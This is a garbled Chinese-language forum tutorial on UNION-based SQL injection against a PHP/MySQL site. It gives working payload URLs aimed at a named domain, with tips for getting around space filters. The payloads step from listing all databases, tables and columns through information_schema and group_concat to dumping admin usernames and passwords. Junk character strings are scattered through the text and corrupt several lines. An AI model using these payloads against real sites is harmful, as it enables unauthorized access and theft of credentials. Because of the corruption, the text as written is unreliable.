$ B9 R. U# v' n7 g" A优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入" |/ w* d8 j- ]3 L; A
1 B% ]4 Y7 U( q# D/ Y3 n
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢... " f8 J5 Y" ]1 e" C . O! p% n" u5 ^& k: r7 x; _下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示* T9 c: I. ]( K: ?& X- i: y% s4 u' e; E
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等 * \/ i2 C& E y$ h. _6 T* Y% ^+ W+ F- y9 f! p! D: F http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,175 I) g1 y: ^/ `
( j H3 X( B, m g R& |读出所有库: $ \, I) k& ]2 d; z. f5 shttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA9 Z( ~+ y0 E+ l: ~7 o
( o/ p, w/ J$ E$ i+ P6 z$ _/ c$ N }& X. y
! v. G, S! f' m读出所有表: 8 h" d `- Z* M: `% h7 A, Z5 Z- bhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()* Q+ {; O; c& I! T; T k# E
) f! d% ] W; y7 o" X2 ~% l( a& g读出所有表字段:& \$ ?) S4 v" t1 D4 M6 S8 h http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110) * w5 s q- m1 Q+ A4 s: z$ n! x9 w*/ (97,100,109,105,110)为admin的ascii码 依次类推/ L; M; m, M$ W* `3 Z8 x
8 _& Y: e7 ?) C: S4 N* z4 ~# r+ T
读出所有表字段里的内容: ; ?2 p: a/ q9 `0 N* Vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin) M1 t- ^( f O+ d
8 l6 U" M" F; Y. o
3 `+ {4 _% }8 m& P' h, _/ _& v! M6 Q+ Z- ?3 G4 V4 J& O